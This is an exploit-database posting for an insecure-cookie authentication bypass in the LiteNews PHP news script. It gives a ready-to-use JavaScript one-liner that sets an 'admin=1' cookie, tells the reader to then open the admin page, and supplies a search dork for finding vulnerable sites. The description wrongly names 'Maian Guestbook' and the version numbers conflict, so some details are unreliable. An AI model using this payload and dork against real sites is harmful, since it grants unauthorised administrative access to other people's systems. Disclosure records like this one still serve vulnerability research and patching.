LiteNews 0.1 - Insecure Cookie Handling

EDB-ID:

6206




Platform:

PHP

Date:

2008-08-05


#########################################################################
#                                                                       #
#         litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability     #
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys						#
# HOME       : http://scary-boys.com					#
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By litenews"         			        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                        		#
#  Maian Guestbook suffers from a insecure cookie                       #
# the admin panel only checks if the cookie exists. 		        #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "admin=1; path=/";                      #
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin/index.php" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-05]